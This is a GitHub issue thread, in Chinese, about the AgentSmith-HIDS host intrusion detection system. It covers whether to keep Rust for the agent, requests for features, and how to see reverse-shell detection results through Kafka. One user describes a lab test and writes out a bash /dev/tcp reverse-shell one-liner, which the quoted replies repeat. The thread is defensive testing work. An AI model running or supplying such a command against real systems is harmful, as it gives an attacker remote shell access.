关于AgentSmith-HIDS后续迭代的问题

[EBWi11]

(该issue是AgentSmith-HIDS作者所提，旨在能和大家保持一定的沟通，听取反馈，长期有效)

1. 有一部分同学表示用户态Agent使用Rust导致一定难度，无法参与到新功能的研发中，调试也有一定困难，希望可以用GoLang替换。笔者也一部分认同该观点，且目前而言重构用户态Agent的工作还算简单，但是Rust作为一门无GC且内存安全的未来的系统级语言来说，还是有一定的优势的。不知道其他的小伙伴如何看待？
2. 大家希望AgentSmith-HIDS什么在未来优先级较高的功能呢？可以留言交流。
3. 有多少小伙伴使用AgentSmith-HIDS呢？是否在这个过程中遇到什么问题？无论是部署/测试/功能的问题，都欢迎提出来。

最后，个人以为，把README读完再进行提问应该是对他人时间的起码的尊重，你认为呢？

[bingozilos]

小白提问贴：不太熟悉linux内核编程，部分源码读起来有些吃力，是否考虑写一些文章略微解释下原理。比如在通过hook sys_execve获取到执行的命令及pid等信息后，执行这个命令的用户信息是从哪里获取的？

[EBWi11]

@bingozilos 好的，近期我会准备一篇文章介绍一下AgentSmith-HIDS的原理和一些开发过程中的坑，敬请期待。在这之前如果感兴趣可以看一些关于Linux LKM开发的文章，应该会比较有帮助。

[EBWi11]

目前已经去除golang版本的用户态agent。

[wanglinhuiyong]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

[AlkenePan]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

请附上你是如何使用的，清晰具体的问题会有让人回答的欲望。

[EBWi11]

@wanglinhuiyong 这篇文章应该可以解答你的疑惑： https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8AgentSmith-HIDS%E6%A3%80%E6%B5%8B%E5%8F%8D%E5%BC%B9shell.md

[wanglinhuiyong]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

请附上你是如何使用的，清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端，另一个作为被控端，我想在被控端能检测到反弹shell。于是按照https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明，在被控端安装了smith.ko及agent。当我在控制端监听某个端口，然后在被控端去连接它（bash -i >& /dev/tcp/ip/port 0>&1）,我怎么知道有没有检测到反弹shell呢？从哪看到的呢？

[AlkenePan]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

请附上你是如何使用的，清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端，另一个作为被控端，我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明，在被控端安装了smith.ko及agent。当我在控制端监听某个端口，然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢？从哪看到的呢？

• 安装 ko 并启动 Agent 后，hids 会开始采集数据并通过 Agent 发送到 Kafka 中，关于 Kafka 的配置可以看这里: https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/conf/settings.rs
• 拿到采集的数据后，可以根据这篇文章的思路分析采集的数据：https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8AgentSmith-HIDS%E6%A3%80%E6%B5%8B%E5%8F%8D%E5%BC%B9shell.md

[wanglinhuiyong]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

请附上你是如何使用的，清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端，另一个作为被控端，我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明，在被控端安装了smith.ko及agent。当我在控制端监听某个端口，然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢？从哪看到的呢？

• 安装 ko 并启动 Agent 后，hids 会开始采集数据并通过 Agent 发送到 Kafka 中，关于 Kafka 的配置可以看这里: https://github.com/EBWi11/AgentSmith-HIDS/blob/master/agent/src/conf/settings.rs
• 拿到采集的数据后，可以根据这篇文章的思路分析采集的数据：https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8AgentSmith-HIDS%E6%A3%80%E6%B5%8B%E5%8F%8D%E5%BC%B9shell.md
  再请教一下：我没懂kafka应该怎么参照agent/src/conf/settings.rs进行配置，我看kafka下的config/server.properties这个配置文件跟agent/src/conf/settings.rs没有相同的字段呀？

[AlkenePan]

请问应该怎么检测反弹shell呢，怎么得到检测反弹shell的结果呢？

请附上你是如何使用的，清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端，另一个作为被控端，我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明，在被控端安装了smith.ko及agent。当我在控制端监听某个端口，然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢？从哪看到的呢？

• 安装 ko 并启动 Agent 后，hids 会开始采集数据并通过 Agent 发送到 Kafka 中，关于 Kafka 的配置可以看这里: /agent/src/conf/settings.rs@master
• 拿到采集的数据后，可以根据这篇文章的思路分析采集的数据：/doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8AgentSmith-HIDS%E6%A3%80%E6%B5%8B%E5%8F%8D%E5%BC%B9shell.md@master
  再请教一下：我没懂kafka应该怎么参照agent/src/conf/settings.rs进行配置，我看kafka下的config/server.properties这个配置文件跟agent/src/conf/settings.rs没有相同的字段呀？

LMGFY: https://www.google.com/search?q=kafka%20setup